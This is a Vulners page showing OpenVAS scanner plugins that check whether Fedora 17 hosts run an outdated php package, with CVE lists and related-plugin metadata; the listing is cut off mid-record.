Search...

Fedora Update for php FEDORA-2013-3927

2013-04-05T00:00:00

ID OPENVAS:865520
Type openvas
Reporter Copyright (c) 2013 Greenbone Networks GmbH
Modified 2017-07-10T00:00:00

Description

Check for the Version of php

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for php FEDORA-2013-3927
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

include("revisions-lib.inc");
tag_insight = "PHP is an HTML-embedded scripting language. PHP attempts to make it
  easy for developers to write dynamically generated web pages. PHP also
  offers built-in database integration for several commercial and
  non-commercial database management systems, so writing a
  database-enabled webpage with PHP is fairly simple. The most common
  use of PHP coding is probably as a replacement for CGI scripts.

  The php package contains the module which adds support for the PHP
  language to Apache HTTP Server.";


tag_affected = "php on Fedora 17";
tag_solution = "Please Install the Updated Packages.";

if(description)
{
  script_id(865520);
  script_version("$Revision: 6628 $");
  script_tag(name:"last_modification", value:"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $");
  script_tag(name:"creation_date", value:"2013-04-05 13:43:44 +0530 (Fri, 05 Apr 2013)");
  script_cve_id("CVE-2013-1635", "CVE-2013-1643", "CVE-2012-2143", "CVE-2012-2386",
                                 "CVE-2012-2311", "CVE-2012-2329", "CVE-2012-1823");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_name("Fedora Update for php FEDORA-2013-3927");

  script_xref(name: "FEDORA", value: "2013-3927");
  script_xref(name: "URL" , value: "http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101330.html");
  script_summary("Check for the Version of php");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms");
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  exit(0);
}


include("pkg-lib-rpm.inc");

release = get_kb_item("ssh/login/release");

res = "";
if(release == NULL){
  exit(0);
}

if(release == "FC17")
{

  if ((res = isrpmvuln(pkg:"php", rpm:"php~5.4.13~1.fc17", rls:"FC17")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99); # Not vulnerable.
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:865520", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for php FEDORA-2013-3927", "description": "Check for the Version of php", "published": "2013-04-05T00:00:00", "modified": "2017-07-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=865520", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["2013-3927", "http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101330.html"], "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2013-1643", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329", "CVE-2013-1635"], "lastseen": "2017-07-25T10:51:36", "viewCount": 4, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2017-07-25T10:51:36", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:866144", "OPENVAS:1361412562310864523", "OPENVAS:864517", "OPENVAS:864590", "OPENVAS:1361412562310866144", "OPENVAS:1361412562310865520", "OPENVAS:1361412562310864517", "OPENVAS:1361412562310866019", "OPENVAS:866019", "OPENVAS:1361412562310864590"]}, {"type": "threatpost", "idList": ["THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "THREATPOST:4E1049C3C10581837DF71F684CB00683", "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5"]}, {"type": "cve", "idList": ["CVE-2013-1635", "CVE-2012-2311", "CVE-2013-3927", "CVE-2012-2143", "CVE-2013-1643", "CVE-2012-2386", "CVE-2012-1823", "CVE-2012-2329"]}, {"type": "f5", "idList": ["SOL14432", "SOL14433", "SOL15478", "F5:K14433", "F5:K15478", "F5:K14432"]}, {"type": "freebsd", "idList": ["59B68B1E-9C78-11E1-B5E0-000C299B62E1", "1D23109A-9005-11E2-9602-D43D7E0C7C02"]}, {"type": "attackerkb", "idList": ["AKB:0E540893-4BAD-42B2-9EEE-658ADE8002D8"]}, {"type": "nessus", "idList": ["FEDORA_2012-7628.NASL", "SLACKWARE_SSA_2013-081-01.NASL", "PHP_5_4_3.NASL", "FREEBSD_PKG_1D23109A900511E29602D43D7E0C7C02.NASL", "FEDORA_2013-3891.NASL", "FREEBSD_PKG_59B68B1E9C7811E1B5E0000C299B62E1.NASL", "DEBIAN_DSA-2639.NASL", "FEDORA_2013-3927.NASL", "PHP_CGI_QUERY_STRING_CODE_EXECUTION.NASL", "FEDORA_2012-7567.NASL"]}, {"type": "postgresql", "idList": ["POSTGRESQL:CVE-2012-2143"]}, {"type": "slackware", "idList": ["SSA-2013-081-01"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12914", "SECURITYVULNS:DOC:29110"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0590-1"]}, {"type": "ubuntu", "idList": ["USN-1437-1"]}, {"type": "amazon", "idList": ["ALAS-2012-095"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2639-1:48C8A"]}, {"type": "cert", "idList": ["VU:520827"]}], "modified": "2017-07-25T10:51:36", "rev": 2}, "vulnersScore": 6.7}, "pluginID": "865520", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2013-3927\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\n\ntag_affected = \"php on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865520);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-05 13:43:44 +0530 (Fri, 05 Apr 2013)\");\n script_cve_id(\"CVE-2013-1635\", \"CVE-2013-1643\", \"CVE-2012-2143\", \"CVE-2012-2386\",\n \"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2013-3927\");\n\n script_xref(name: \"FEDORA\", value: \"2013-3927\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101330.html\");\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.13~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}

{"openvas": [{"lastseen": "2018-01-26T11:10:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2013-1643", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329", "CVE-2013-1635"], "description": "Check for the Version of php", "modified": "2018-01-25T00:00:00", "published": "2013-06-24T00:00:00", "id": "OPENVAS:866019", "href": "http://plugins.openvas.org/nasl.php?oid=866019", "type": "openvas", "title": "Fedora Update for php FEDORA-2013-10233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2013-10233\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\n\ntag_affected = \"php on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(866019);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-24 14:49:08 +0530 (Mon, 24 Jun 2013)\");\n script_cve_id(\"CVE-2013-1643\", \"CVE-2013-1635\", \"CVE-2012-2143\", \"CVE-2012-2386\",\n \"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2013-10233\");\n\n script_xref(name: \"FEDORA\", value: \"2013-10233\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109692.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2013-1643", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329", "CVE-2013-1635"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-04-05T00:00:00", "id": "OPENVAS:1361412562310865520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865520", "type": "openvas", "title": "Fedora Update for php FEDORA-2013-3927", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2013-3927\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865520\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-05 13:43:44 +0530 (Fri, 05 Apr 2013)\");\n script_cve_id(\"CVE-2013-1635\", \"CVE-2013-1643\", \"CVE-2012-2143\", \"CVE-2012-2386\",\n \"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2013-3927\");\n script_xref(name:\"FEDORA\", value:\"2013-3927\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101330.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"php on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.13~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2013-1643", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329", "CVE-2013-1635"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-24T00:00:00", "id": "OPENVAS:1361412562310866019", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866019", "type": "openvas", "title": "Fedora Update for php FEDORA-2013-10233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2013-10233\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866019\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-24 14:49:08 +0530 (Mon, 24 Jun 2013)\");\n script_cve_id(\"CVE-2013-1643\", \"CVE-2013-1635\", \"CVE-2012-2143\", \"CVE-2012-2386\",\n \"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2013-10233\");\n script_xref(name:\"FEDORA\", value:\"2013-10233\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109692.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"php on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2013-4113", "CVE-2012-2386", "CVE-2013-1643", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329", "CVE-2013-1635"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-01T00:00:00", "id": "OPENVAS:1361412562310866144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866144", "type": "openvas", "title": "Fedora Update for php FEDORA-2013-12354", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2013-12354\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866144\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-01 18:28:11 +0530 (Thu, 01 Aug 2013)\");\n script_cve_id(\"CVE-2013-4113\", \"CVE-2013-1643\", \"CVE-2013-1635\", \"CVE-2012-2143\",\n \"CVE-2012-2386\", \"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2013-12354\");\n\n\n script_tag(name:\"affected\", value:\"php on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-12354\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/112246.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.17~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:52:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2013-4113", "CVE-2012-2386", "CVE-2013-1643", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329", "CVE-2013-1635"], "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2013-08-01T00:00:00", "id": "OPENVAS:866144", "href": "http://plugins.openvas.org/nasl.php?oid=866144", "type": "openvas", "title": "Fedora Update for php FEDORA-2013-12354", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2013-12354\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866144);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-01 18:28:11 +0530 (Thu, 01 Aug 2013)\");\n script_cve_id(\"CVE-2013-4113\", \"CVE-2013-1643\", \"CVE-2013-1635\", \"CVE-2012-2143\",\n \"CVE-2012-2386\", \"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2013-12354\");\n\n tag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\neasy for developers to write dynamically generated web pages. PHP also\noffers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a\ndatabase-enabled webpage with PHP is fairly simple. The most common\nuse of PHP coding is probably as a replacement for CGI scripts.\n\nThe php package contains the module which adds support for the PHP\nlanguage to Apache HTTP Server.\n\";\n\n tag_affected = \"php on Fedora 17\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-12354\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/112246.html\");\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.17~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864517", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-9490", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-9490\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/083318.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864517\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:24:06 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\", \"CVE-2012-2143\", \"CVE-2012-2386\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9490\");\n script_name(\"Fedora Update for php FEDORA-2012-9490\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n 